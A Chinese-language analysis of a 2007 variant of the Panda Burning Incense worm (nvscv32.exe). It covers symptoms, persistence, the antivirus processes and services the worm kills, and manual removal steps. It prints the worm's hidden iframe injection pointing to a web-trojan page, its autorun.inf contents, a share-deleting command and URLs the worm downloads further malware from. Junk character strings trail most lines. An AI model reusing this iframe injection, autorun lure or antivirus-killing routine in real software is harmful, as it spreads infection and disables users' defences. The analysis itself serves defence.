熊猫烧香最新变种分析及查杀方法

文件名称：nvscv32.exe ,o0[^-b<  
:#UA!|nV  
病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商） =`!#V/=  
}_Y\6fcd  
中文名称：（尼姆亚，熊猫烧香） Z5*O\kJv  
~F;>4q   
病毒大小：68,570 字节 <AHdz/N  
xj5MKX{CJT  
编写语言：Borland Delphi 6.0 - 7.0 xo(>nFjo  
\}gITc).j  
加壳方式：FSG 2.0 -> bart/xt VT;cz6"6b4  

\Awqr:A&  
发现时间：2007.1.16 u~Y+YzCxV  
bV*q~@xh  
危害等级：高 !OOOc  
K~qKr<)  
一、病毒描述： `R-VJR 2"  
JaN53,&<  
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。 -(E-yCu  
#BI6+rfv|  
二：中毒现象： wFJ*2W:  
Gd|j
E  
1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。 `Tr !Gj_  
I=k`VId:  
2：无法手工修改“文件夹选项”将隐藏文件显示出来。 cdg&)  
zB6&),[,v  
3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16 ^>s{o5H&  
:
x!'Eer n  
4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe> .0dx@Sbv  
i>=y3x"  
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。 yq` ,)  
)2F%^<gZ#  
6：不能正常使用任务管理器，SREng.exe等工具。 7[M@;$  
v5L#H=P  
7：无故的向外发包，连接局域网中其他机器。 P_Exh]P  
.zJZ*\2ob  
三：技术分析 Oz=!EG|N  
}5u;'>$  
1：病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe = Fwzm^}6  
"gXvnl  
建立注册表自启动项: D Z=OZ.v  
l YjPrA]TC  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] |YrvY1d!  
%vU
*4mH  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" 92^Dn`g  
*C(q{|f  
2：查找反病毒窗体病毒结束相关进程: XE;aJ'kt  
l, -q:8  
天网防火墙 ::Pf\Lb>  
Bs<LJzS{V  
virusscan f/i[? gw  
=jvN8R*[  
symantec antivirus 0"u=g)3  
.1[pO_  
system safety monitor LhKUZX,P8  
4Gsq)i17j  
system repair engineer ?WrL<?r)}U  
[Ib17#74  
wrapped gift killer XKbTjR  
z2SR/[I?  
游戏木马检测大师 XQj+]-m  
X+//$J  
超级巡警 ?$4CgN-  
w%kaM=  
3：结束以下进程: ^I!gteU;  
u6P U(f  
mcshield.exe o6S`7uwJ*/  
9`DY6qfly  
vstskmgr.exe UG,n
q  
$)7Af6xD  
naprdmgr.exe ~#iAW@  
%* @hS`  
updaterui.exe 21\?FQrz  
xf8.PqVNo  
tbmon.exe \V9);KAOj  
3$kElq[  
scan32.exe ~;nW+S$o  
f
{#Mc  
ravmond.exe 6 ZVD<C:\  
]w9syz8X  
ccenter.exe Td![Id  
Bh!J&SM:  
ravtask.exe BsN~Z!kd  
.n)0@X!  
rav.exe A>}]=Ii/  
@#| R{5=+  
ravmon.exe IV$2`)[A&X  
_ 4+=S)$  
ravmond.exe "RsH
'`  
DT#Z6A  
ravstub.exe '>|5  
\EEU G^T  
kvxp.kxp xqaw00,s  
|-VbJd  
kvmonxp.kxp WFpR@53Db  
h3kBNBI )  
kvcenter.kxp Px
"K5c*  
IN94[yW{1  
kvsrvxp.exe M.}QXta  
F84?Mi{r2  
kregex.exe 2v\-xg%1  
@EcY&mP)  
uihost.exe n!y}p q6  
IctLhYZ  
trojdie.kxp 7$I *ju_  
W[j7Vi8v  
frogagent.exe 'P~6_BW  
e\>g@xE%  
kvxp.kxp 9:6d,^X  
=;A~$[g  
kvmonxp.kxp _k.gVm  
9TW  
kvcenter.kxp %uhhQ<zs%  
&M^FA=J\  
kvsrvxp.exe EAjo>GLI  
zs@[!?A,  
kregex.exe Yg14aKZl  
) XHcrm&  
uihost.exe T2MX_rt#D  
t9 m],aH  
trojdie.kxp QYTwGThWR  
^7~w yAr  
frogagent.exe %epK-q9[  
._z[T@!9  
logo1_.exe :7Q, `W9  
},
LW@Z}  
logo_1.exe q! U
'DDEP  
EaGS}=qY5  
rundl132.exe uP[:P?,t  
H=k*;'  
taskmgr.exe 8?7:sfc  
XS/5y(W  
msconfig.exe CiGN?1|  
lb('=]3 }H  
regedit.exe >xE{& ):  
TID0x/j"K5  
sreng.exe cZ~\jpK  
4：禁用下列服务: .U !;fJ9  
emI]'{_G  
schedule wc'K=;c  
d\ Z#XzI8  
sharedaccess oxPb; %  
@*c) s_  
rsccenter F-n1J?4b  
I"=XM   
rsravmon 4x:Odt5  
RFkJ^=}  
rsccenter Ma3H
n  
4n@, p0  
kvwsc r8~U@$BBK  
Up$vBE8i]  
kvsrvxp 1`_i%R^  
%R{clbbbn  
kvwsc t%AW0#TZ  
/vB%gqJvX  
kvsrvxp Do|`wpR  
? I}T[j  
kavsvc ?Y~>H2  
Pz"!8b-MN  
avp jjm-%W@  
-j9R%+YW<  
avp !2N#H~{  
F#^.L|d4  
kavsvc LV 94i  
mYk5f_}  
mcafeeframework U9xFQ=$2  
BI=Ie?  
mcshield k>Qr
14F  
mHox  
mctaskmanager .-N9\GlJ,d  
b`K~l'8  
mcafeeframework Q_#X*I  
}h>e=<  
mcshield <..%@]+  
$/45*  
mctaskmanager l(zkMR$b8  
^dYLB.'=  
navapsvc
\'"q6y  
>|7&hj$  
wscsvc *.EtdcRo[  
t Q_}o[  
kpfwsvc j&Ayk*  
W^&t8
d2  
sndsrvc G$4lH>A&  
.?S#DS )  
ccproxy J\
  
BoIe<{X(9  
ccevtmgr #D+Fq^="P  
a+mq=K  
ccsetmgr miHW1h[=  
\{+7`4g  
spbbcsvc
qg6Hk:^r  
XW]|Mv[M  
symantec core lc uD:O[H-x  
HA"dw2|  
npfmntor ~rY<y%K  
~5}b$qL#`  
mskservice D?5W1m]E,s  
#8|;Q`Or:  
firesvc cX.v^9kuX  
-3_kS/  
5：删除下列注册表项: J(/ eR,ak  
fBd +gT\S  
software\microsoft\windows\currentversion\run\ravtask #0Oqw=F  
Qn%*kU0X  
software\microsoft\windows\currentversion\run\kvmonxp 05pCgI}F>  
bJB:]vs$  
software\microsoft\windows\currentversion\run\kav [TO:-8$.  
zLXtj-  
software\microsoft\windows\currentversion\run\kavpersonal50 !FpMO`m  
*bRH,u  
software\microsoft\windows\currentversion\run\mcafeeupdaterui &|E2L1  
\wDOE(>  
software\microsoft\windows\currentversion\run\network associates error reporting service A7b7IM
[  
`&9#!T.  
software\microsoft\windows\currentversion\run\shstatexe l]v *h0!  
;-]f4O8  
software\microsoft\windows\currentversion\run\ylive.exe q9WSQ$:z8  
X?7$JV-:  
software\microsoft\windows\currentversion\run\yassistse ir,Zc\C  
,$;CII v  
6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了） cF v
GpZ  
bh7 1Zu  
7：跳过下列目录: /CA)R26G  
{&h&:  
windows 5E!|-xD  
]B,S<*h  
winnt ]&G5/]f  
:Dr& {3>  
systemvolumeinformation ^~`8 - TE  
:sPku<1is  
recycled *10e)rzM  
=v;-{oN!  
windowsnt \ I?;%  
WVNQ}KY  
windowsupdate nev*TYY?A  
dU&.gFw1  
windowsmediaplayer m1[QD26  
9C4l@jrF  
outlookexpress l5h9Eq  
'g=yJ  
netmeeting xd .I5  
+qz)KtJS  
commonfiles M"9 zK[cz  
UxS;m4  
complusapplications "BVz5?  
yZ!Eu#81  
commonfiles +pcj8K%  
AV2q*  
messenger W#lvH=y  
.y\HQ^j  
installshieldinstallationinformation ,F-tvSc\Q  
?D\%ZXo  
msn Czci6Lz  
Zgg7pL)#c  
microsoftfrontpage "pWdz}!  
V.-?aXQ*  
moviemaker no/]Me!j=  
<#s-hQ  
msngaminzone i Lm1l  
5~44R@`  
8：删除*.gho备份文件. _L=vK=,  
W?l .QQk  
9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统. -pD&@Wlwak  
,X$Avdc2  
autorun.inf内容： iP!Y4F  
gP`!MlY@  
程序代码 bNaUzM!,H  
Hwc{%.%ae  
[AutoRun] ,m"ztu-  
ILO+=xU  
OPEN=setup.exe )R +o8C  
2?r8>#_*  
shellexecute=setup.exe xXx`a\i  
- dOT/%Ux  
shell\Auto\command=setup.exe hv"toszj\  
GY",AL8f  
10：删除共享：cmd.exe /c net share admin$ /del /y )4`Ml*7x  

3H%HJS  
11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。 jF3!}*7,  
/SUV'J)  
12：扫描局域网机器，一旦发现漏洞，就迅速传播。 &Bp\kv  
13：在后台访问http://www.whboy.net/update/wormcn.txt，根据下载列表下载其他病毒。 z^Jl4V  
3'"M31iA  
目前下载列表如下： -+9x 0-P  
uv-W/p  
http://www.krvkr.com/down/cq.exe wqwJpWIe  
9V],X=y~  
http://www.krvkr.com/down/mh.exe >b["T+  
E&>,B81
  
http://www.krvkr.com/down/my.exe Me}TW!GC  
C}h@El  
http://www.krvkr.com/down/wl.exe YEQW:r_h.S  
HEuM"2{DMM  
http://www.krvkr.com/down/rx.exe v2n0[b0  
gZjO
lp  
http://www.krvkr.com/down/wow.exe `es($7}P_W  
O|>1~^w  
http://www.krvkr.com/down/zt.exe |x6mkSf]ke  
#8z,'~\  
http://www.krvkr.com/down/wm.exe sv;zvEn;-L  
;/V@N |$n  
http://www.krvkr.com/down/dj.exe ,OKM\N,  
F3Y>hs):7  
http://www.krvkr.com/cn/iechajian.exe H{f_:z{{  
~t:b<'/  
到此病毒行为分析完毕。 ?&"^\p  
X?6h>%) k  
四：Sec120.Com专家解决方案： y^AA#kk  
Xo@YTol  
1：关闭网络共享，断开网络。 VDTY<= Q  
_=L;`~=C9e  
2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前） Idlu1g  
MA+-2pMc|7  
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1
VM]IL%AN  
"k-ov9yK  
4：删除注册表启动项 &'7"i~pC  
R1.sq(z`  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] Nr"N\yOA/  
%<?ciU  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" 
j/9
QV  
iw fp'  
5：删除C:\WINDOWS\system32\drivers\nvscv32.exe M_1Tx  
v1C
.\fL  
6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。 grQnV' q  
"rGOw'!q>  
7：如果电脑上有脚本文件，将病毒代码全部删除。 (L5'rNk  
+^kxFQ(:  
8：关闭系统的自动播放功能。 rh`.$/^  
[S]!+YBK  
这样就基本上将病毒清除了